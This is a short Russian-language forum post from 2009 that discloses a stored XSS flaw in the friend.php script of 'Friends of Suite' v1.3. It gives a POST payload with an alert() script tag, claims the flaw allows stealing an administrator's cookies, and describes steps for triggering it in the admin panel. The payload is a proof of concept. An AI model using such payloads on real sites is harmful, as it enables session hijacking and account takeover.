27.02.2009, 18:08
|
|
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478
Репутация:
999
|
|
Friends of Suite
Версия: v.1.3
Активная XSS от любого пользователя(100% кража куки админа)
Уязвимый скрипт: friend.php
Запрос: reg_name=<h1><script>alert(/xss/);</script>XSS</h1>®_adress=http://127.0.0.1/
Метод: POST
Уязвимый кусок кода:
Теперь попробуйте добавить сайт с названием <h1>xss</h1> и любым url'ом где есть ссылка на ваш хост.
Смотрим админку, и вот! XSS видна :P
Хотя script удаляет...
Последний раз редактировалось -Hormold-; 27.02.2009 в 18:16..
|
|
|